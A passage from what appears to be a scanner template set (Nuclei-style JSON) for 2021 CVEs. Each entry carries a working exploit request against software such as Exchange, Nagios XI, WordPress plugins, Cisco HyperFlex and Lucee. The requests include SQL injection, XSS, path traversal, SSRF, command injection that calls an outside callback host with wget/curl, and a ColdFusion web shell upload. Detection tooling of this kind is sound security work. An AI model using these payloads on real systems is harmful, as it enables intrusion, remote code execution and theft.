'woocommerce_persian_translate')"],"condition":"and"}]}]},{"id":"CVE-2021-41460","info":{"name":"ECShop 4.1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /delete_cart_goods.php  HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid=1||(updatexml(1,concat(0x7e,(select%20md5({{num}}))),1))\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["c8c605999f3d8352d7bb792cf3fdb25"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-22054","info":{"name":"VMWare Workspace ONE UEM - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/Catalog/BlobHandler.ashx?Url=YQB3AGUAdgAyADoAawB2ADAAOgB4AGwAawBiAEoAbwB5AGMAVwB0AFEAMwB6ADMAbABLADoARQBKAGYAYgBHAE4ATgBDADUARQBBAG0AZQBZAE4AUwBiAFoAVgBZAHYAZwBEAHYAdQBKAFgATQArAFUATQBkAGcAZAByAGMAMgByAEUAQwByAGIAcgBmAFQAVgB3AD0A"],"matchers-condition":"and","matchers":[{"type":"word","words":["Interactsh Server"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24666","info":{"name":"WordPress Podlove Podcast Publisher <3.5.6 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?rest_route=/podlove/v1/social/services/contributor/1&id=1%20UNION%20ALL%20SELECT%20NULL,NULL,md5('CVE-2021-24666'),NULL,NULL,NULL--%20-"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["66a82937a7660b73b00d4f7cefee6c85","\"service_id\""],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25296","info":{"name":"Nagios XI 5.5.6-5.7.5 - Authenticated Remote Command Injection","severity":"high"},"requests":[{"raw":["GET /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\n","POST /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnsp={{nsp}}&pageopt=login&username={{username}}&password={{password}}\n","GET /nagiosxi/index.php HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 20s\nGET /nagiosxi/config/monitoringwizard.php?update=1&nsp={{nsp_auth}}&nextstep=3&wizard=windowswmi&check_wmic_plus_ver=1.65&ip_address=127.0.0.1&domain=127.0.0.1&username=username&password=password&plugin_output_len=9999%3bwget%20{{interactsh-url}}%3b HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body_4","words":["Event Log","Display Name"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"nsp","group":1,"regex":["name=['\"]nsp['\"] value=['\"](.*)['\"]>"],"internal":true,"part":"body"},{"type":"regex","name":"nsp_auth","group":1,"regex":["var nsp_str = ['\"](.*)['\"];"],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-25099","info":{"name":"WordPress GiveWP <2.17.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\naction=give_checkout_login&form_id=xxxxxx\"><script>alert(document.domain)</script>\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains(body, \"<script>alert(document.domain)</script>\")","contains(body, \"give_user_login\")"],"condition":"and"}]}]},{"id":"CVE-2021-28149","info":{"name":"Hongdian H8922 3.0.5 Devices - Local File Inclusion","severity":"medium"},"requests":[{"raw":["GET /log_download.cgi?type=../../etc/passwd HTTP/1.1\nHost: {{Hostname}}\nCache-Control: max-age=0\nAuthorization: Basic Z3Vlc3Q6Z3Vlc3Q=\n","GET /log_download.cgi?type=../../etc/passwd HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic YWRtaW46YWRtaW4=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"regex","part":"body","regex":["root:.*:0:0:","sshd:[x*]","root:[$]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21087","info":{"name":"Adobe ColdFusion - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cf_scripts/scripts/ajax/package/cfajax.js","{{BaseURL}}/cf-scripts/scripts/ajax/package/cfajax.js","{{BaseURL}}/CFIDE/scripts/ajax/package/cfajax.js","{{BaseURL}}/cfide/scripts/ajax/package/cfajax.js","{{BaseURL}}/CF_SFSD/scripts/ajax/package/cfajax.js","{{BaseURL}}/cfide-scripts/ajax/package/cfajax.js","{{BaseURL}}/cfmx/CFIDE/scripts/ajax/package/cfajax.js"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","regex":["eval\\(\\\"\\(\\\"\\+json\\+\\\"\\)\\\"\\)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-44139","info":{"name":"Alibaba Sentinel - Server-side request forgery (SSRF)","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/registry/machine?app={{rand_base(5)}}&appType=0&version=0&hostname={{rand_base(5)}}&ip={{interactsh-url}}&port=0"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"header","words":["application/json"]},{"type":"word","part":"body","words":["\"success\":true","\"msg\":\"success\""],"condition":"and"}]}]},{"id":"CVE-2021-32820","info":{"name":"Express-handlebars - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/?layout=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","daemon:[x*]:0:0:","operator:[x*]:0:0:"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24358","info":{"name":"Plus Addons for Elementor Page Builder < 4.1.10 - Open Redirect","severity":"medium"},"requests":[{"raw":["GET /?author=1 HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-login.php?action=theplusrp&key=&redirecturl=http://interact.sh&forgoturl=http://interact.sh&login={{username}} HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}],"extractors":[{"type":"regex","name":"username","group":1,"regex":["Author:(?:[A-Za-z0-9 -\\_=\"]+)?<span(?:[A-Za-z0-9 -\\_=\"]+)?>([A-Za-z0-9]+)<\\/span>"],"internal":true,"part":"body"},{"type":"regex","name":"username","group":1,"regex":["ion: https:\\/\\/[a-z0-9.]+\\/author\\/([a-z]+)\\/"],"internal":true,"part":"header"}]}]},{"id":"CVE-2021-26855","info":{"name":"Microsoft Exchange Server SSRF Vulnerability","severity":"critical"},"requests":[{"raw":["GET /owa/auth/x.js HTTP/1.1\nHost: {{Hostname}}\nCookie: X-AnonResource=true; X-AnonResource-Backend={{interactsh-url}}/ecp/default.flt?~3;\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2021-24300","info":{"name":"WordPress WooCommerce <1.13.22 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/edit.php?post_type=wcps&page=import_layouts&keyword=\"onmouseover%3Dalert%28document.domain%29%3B%2F%2F HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["value=\"\\\"onmouseover=alert(document.domain);//\">","PickPlugins Product Slider"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24991","info":{"name":"WooCommerce PDF Invoices & Packing Slips WordPress Plugin < 2.10.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=wpo_wcpdf_options_page&section=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29+x%3D HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\" style=animation-name:rotation onanimationstart=alert(document.domain) x","WooCommerce PDF Invoices"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-1497","info":{"name":"Cisco HyperFlex HX Data Platform - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /auth/change HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nusername=root&password={{url_encode(payload)}}\n","POST /auth HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nusername=root&password={{url_encode(payload)}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]}]}]},{"id":"CVE-2021-25065","info":{"name":"Smash Balloon Social Post Feed < 4.1.1 - Authenticated Reflected Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=cff-top&cff_access_token=xox%3C%2Fscript%3E%3Cimg+src+onerror%3Dalert(document.domain)%3E&cff_final_response=true HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"<img src onerror=alert(document.domain)>\")","contains(body_2, \"custom-facebook-feed\")"],"condition":"and"}]}]},{"id":"CVE-2021-39350","info":{"name":"FV Flowplayer Video Player WordPress plugin  - Authenticated Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=fv_player_stats&player_id=1</script><script>alert(document.domain)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>","<h1>FV Player Stats</h1>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-30461","info":{"name":"VoipMonitor <24.61 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /index.php HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nContent-Type: application/x-www-form-urlencoded\n\nSPOOLDIR=test\".system(id).\"&recheck=Recheck\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["uid=","gid=","groups=","VoIPmonitor installation"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-42566","info":{"name":"myfactory FMS  -  Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ie50/system/login/SysLoginUser.aspx?Login=Error&Error=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/system/login/SysLoginUser.aspx?Login=Error&Error=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-33357","info":{"name":"RaspAP <=2.6.5 - Remote Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/ajax/networking/get_netcfg.php?iface=;curl%20{{interactsh-url}}/`whoami`;"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","words":["DHCPEnabled"]}],"extractors":[{"type":"regex","group":1,"regex":["GET \\/([a-z-]+) HTTP"],"part":"interactsh_request"}]}]},{"id":"CVE-2021-39327","info":{"name":"WordPress BulletProof Security 5.1 Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/bps-backup/logs/db_backup_log.txt","{{BaseURL}}/wp-content/plugins/bulletproof-security/admin/htaccess/db_backup_log.txt"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["BPS DB BACKUP LOG","=================="],"condition":"and"},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41293","info":{"name":"ECOA Building Automation System - Arbitrary File Retrieval","severity":"high"},"requests":[{"raw":["POST /viewlog.jsp HTTP/1.1\nHost: {{Hostname}}\n\nyr=2021&mh=6&fname=../../../../../../../../etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21745","info":{"name":"ZTE MF971R - Referer authentication bypass","severity":"medium"},"requests":[{"raw":["GET /goform/goform_get_cmd_process?cmd=psw_fail_num_str HTTP/1.1\nHost: {{Hostname}}\nReferer: http://interact.sh/127.0.0.1.html\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["psw_fail_num_str\":\"[0-9]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-37589","info":{"name":"Virtua Software Cobranca <12R - Blind SQL Injection","severity":"high"},"requests":[{"raw":["POST /controller/origemdb.php?idselorigem=ATIVOS HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n","POST /controller/login.php?acao=autenticar HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\n\nidusuario='&idsenha=test&tipousr=Usuario\n","POST /controller/login.php?acao=autenticar HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\n\nidusuario=''&idsenha=a&tipousr=Usuario\n"],"cookie-reuse":true,"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_3, \"Os parametros n\u00e3o est\u00e3o informados corretamente\")","contains(body_3, \"O CNPJ dos parametro n\u00e3o est\u00e1 informado corretamente\")"],"condition":"or"},{"type":"dsl","dsl":["status_code_2 == 500 && status_code_3 == 200"]}]}]},{"id":"CVE-2021-30497","info":{"name":"Ivanti Avalanche 6.3.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/AvalancheWeb/image?imageFilePath=C:/windows/win.ini"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["for 16-bit app support"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25899","info":{"name":"Void Aural Rec Monitor 9.0.0.1 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /AurallRECMonitor/services/svc-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nparam1=dummy'+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))dummy)--+dummy&param2=test\n"],"matchers":[{"type":"dsl","dsl":["duration>=5","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"Contacte con el administrador\")"],"condition":"and"}]}]},{"id":"CVE-2021-40908","info":{"name":"Purchase Order Management v1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /classes/Login.php?f=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername=test'+AND+(SELECT+4458+FROM+(SELECT(SLEEP(6)))JblN)+AND+'orQN'='orQN&password=test\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(header, \"text/html\")","contains(body, \"status\\\":\\\"incorrect\\\"\")"],"condition":"and"}]}]},{"id":"CVE-2021-32682","info":{"name":"elFinder 2.1.58 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/elfinder/elfinder-cke.html","{{BaseURL}}/assets/backend/elfinder/elfinder-cke.html","{{BaseURL}}/assets/elFinder-2.1.9/elfinder.html","{{BaseURL}}/assets/elFinder/elfinder.html","{{BaseURL}}/backend/elfinder/elfinder-cke.html","{{BaseURL}}/elfinder/elfinder-cke.html","{{BaseURL}}/uploads/assets/backend/elfinder/elfinder-cke.html","{{BaseURL}}/uploads/assets/backend/elfinder/elfinder.html","{{BaseURL}}/uploads/elfinder/elfinder-cke.html"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["elfinder","php/connector"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-31862","info":{"name":"SysAid 20.4.74 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/KeepAlive.jsp?stamp=%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers":[{"type":"dsl","dsl":["(body == \"false <script>alert(document.domain)</script>\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2021-29203","info":{"name":"HPE Edgeline Infrastructure Manager <1.22 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["PATCH /redfish/v1/SessionService/ResetPassword/1/ HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/json\n\n{\"Password\":\"{{randstr}}\"}\n","POST /redfish/v1/SessionService/Sessions/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"UserName\":\"Administrator\",\"Password\":\"{{randstr}}\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["X-Auth-Token","PasswordReset","Location"],"condition":"and"},{"type":"word","part":"body","words":["Base.1.0.Created"]},{"type":"status","status":[201]}]}]},{"id":"CVE-2021-24827","info":{"name":"WordPress Asgaros Forum <1.15.13 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nGET /forum/?subscribe_topic=1%20union%20select%201%20and%20sleep(6) HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"asgarosforum\")"],"condition":"and"}]}]},{"id":"CVE-2021-32172","info":{"name":"Maian Cart <=3.8 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /admin/index.php?p=ajax-ops&op=elfinder&cmd=mkfile&name={{randstr}}.php&target=l1_Lw HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","POST /admin/index.php?p=ajax-ops&op=elfinder HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/javascript, /; q=0.01\nAccept-Language: en-US,en;q=0.5\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\ncmd=put&target={{hash}}&content=%3c%3fphp%20echo%20%22{{randstr_1}}%22%3b%20%3f%3e\n","GET /product-downloads/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(body_3, \"{{randstr_1}}\")","status_code_3 == 200"],"condition":"and"}],"extractors":[{"type":"regex","name":"hash","group":1,"regex":["\"hash\"\\:\"(.*?)\"\\,"],"internal":true}]}]},{"id":"CVE-2021-42192","info":{"name":"KONGA 0.14.9 - Privilege Escalation","severity":"high"},"requests":[{"raw":["POST /login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"password\": \"{{password}}\", \"identifier\": \"{{username}}\"}\n","POST /api/user/{{id}} HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\nContent-Type: application/json;charset=utf-8\n\n{\"token\": \"{{token}}\"}\n","PUT /api/user/{{id}} HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\nContent-Type: application/json;charset=utf-8\n\n{\"admin\": \"true\", \"passports\": {\"password\": \"{{password}}\", \"protocol\": \"local\"}, \"token\": \"{{token}}\", \"password_confirmation\": \"{{password}}\"}\n"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_2, \"\\\"admin\\\":false\")","contains(body_3, \"\\\"admin\\\":true\")"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"id","group":1,"regex":["\"id\":([0-9]+)"],"internal":true,"part":"body"},{"type":"regex","name":"token","group":1,"regex":["\"token\":\"(.*)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-31856","info":{"name":"Layer5 Meshery 0.5.2 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/experimental/patternfile?order=id%3Bselect(md5({{num}}))&page=0&page_size=0"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-46107","info":{"name":"Ligeo Archives Ligeo Basics - Server Side Request Forgery","severity":"high"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","GET /archive/download?file=file:///etc/passwd HTTP/1.1\nHost: {{Hostname}}\n","GET /archive/download?file=http://{{interactsh-url}}/ HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["regex('root:.*:0:0:', body_2) && contains(body_1, 'Ligeo Archives')","contains(interactsh_protocol, 'http') && contains(body_1, 'Ligeo Archives')"]}]}]},{"id":"CVE-2021-21307","info":{"name":"Lucee Admin - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /lucee/admin/imgProcess.cfm?file=/whatever HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nimgSrc=a\n","POST /lucee/admin/imgProcess.cfm?file=/../../../context/{{randstr}}.cfm HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nimgSrc=\n<cfoutput>\n\n<table>\n<form method=\"POST\" action=\"\">\n<tr><td>Command:</td><td><input type=test name=\"cmd\" size=50\n<cfif isdefined(\"form.cmd\")>value=\"#form.cmd#\"</cfif>><br></td></tr>\n<tr><td>Options:</td><td> <input type=text name=\"opts\" size=50\n<cfif isdefined(\"form.opts\")>value=\"#form.opts#\"</cfif>><br></td></tr>\n<tr><td>Timeout:</td><td> <input type=text name=\"timeout\" size=4\n<cfif isdefined(\"form.timeout\")>value=\"#form.timeout#\"\n<cfelse> value=\"5\"</cfif>></td></tr>\n</table>\n<input type=submit value=\"Exec\" >\n</form>\n<cfif isdefined(\"form.cmd\")>\n<cfsavecontent variable=\"myVar\">\n<cfexecute name = \"#Form.cmd#\"\narguments = \"#Form.opts#\"\ntimeout = \"#Form.timeout#\">\n</cfexecute>\n</cfsavecontent>\n<pre>\n","POST /lucee/{{randstr}}.cfm HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nContent-Type: application/x-www-form-urlencoded\n\ncmd=id&opts=&timeout=5\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["uid=","gid=","groups="],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["(u|g)id=.*"]}]}]},{"id":"CVE-2021-20092","info":{"name":"Buffalo WSR-2533DHPL2 - Improper Access Control","severity":"high"},"requests":[{"raw":["GET /images/..%2finfo.html HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}/info.html\n","GET /images/..%2fcgi/cgi_i_filter.js?_tn={{trimprefix(base64_decode(httoken), base64_decode(\"R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\"))}} HTTP/1.1\nHost: {{Hostname}}\nCookie: lang=8; url=ping.html; mobile=false;\nReferer: {{BaseURL}}/info.html\nContent-Type: application/x-www-form-urlencoded\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/x-javascript"]},{"type":"word","words":["/*DEMO*/","addCfg("],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"httoken","group":1,"regex":["base64\\,(.*?)\" border="],"internal":true}]}]},{"id":"CVE-2021-24236","info":{"name":"WordPress Imagements <=1.2.5 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /wp-comments-post.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryIYl2Oz8ptq5OMtbU\n\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; name=\"comment\"\n\n{{randstr}}\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; name=\"author\"\n\n{{randstr}}\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; name=\"email\"\n\n{{randstr}}@email.com\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; name=\"url\"\n\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; name=\"checkbox\"\n\n\nyes\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; name=\"naam\"\n\n{{randstr}}\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; name=\"image\"; filename=\"{{php}}\"\nContent-Type: image/jpeg\n\n<?php echo 'CVE-2021-24236'; ?>\n\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; name=\"submit\"\n\nPost Comment\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; name=\"comment_post_ID\"\n\n{{post}}\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; name=\"comment_parent\"\n\n0\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU--\n","GET /wp-content/plugins/imagements/images/{{php}} HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers":[{"type":"word","part":"body_2","words":["CVE-2021-24236"]}]}]},{"id":"CVE-2021-41467","info":{"name":"JustWriting  -  Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/sync/dropbox/download?challenge=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-46379","info":{"name":"D-Link DIR850 ET850-1.08TRb03 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/boafrm/formWlanRedirect?redirect-url=http://interact.sh&wlan_id=1"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2021-46069","info":{"name":"Vehicle Service Management System 1.0 - Stored Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /classes/Login.php?f=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername={{username}}&password={{password}}\n","POST /classes/Master.php?f=save_mechanic HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid=&name=%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&contact=asd1&email=asd1@asd.com&status=1\n","GET /admin/?page=mechanics HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(header_3, 'text/html')","status_code_3 == 200","contains(body_3, \"<td>\\\"><script>alert(document.domain)</script></td>\")"],"condition":"and"}]}]},{"id":"CVE-2021-33044","info":{"name":"Dahua IPC/VTH/VTO - Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST /RPC2_Login HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/javascript, */*; q=0.01\nConnection: close\nX-Requested-With: XMLHttpRequest\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\n\n{\"id\": 1, \"method\": \"global.login\", \"params\": {\"authorityType\": \"Default\", \"clientType\": \"NetKeyboard\", \"loginType\": \"Direct\", \"password\": \"Not Used\", \"passwordType\": \"Default\", \"userName\": \"admin\"}, \"session\": 0}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"result\":true","id","params","session"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":[",\"result\":true,\"session\":\"([a-z]+)\"\\}"],"part":"body"}]}]},{"id":"CVE-2021-40323","info":{"name":"Cobbler <3.3.0 - Remote Code 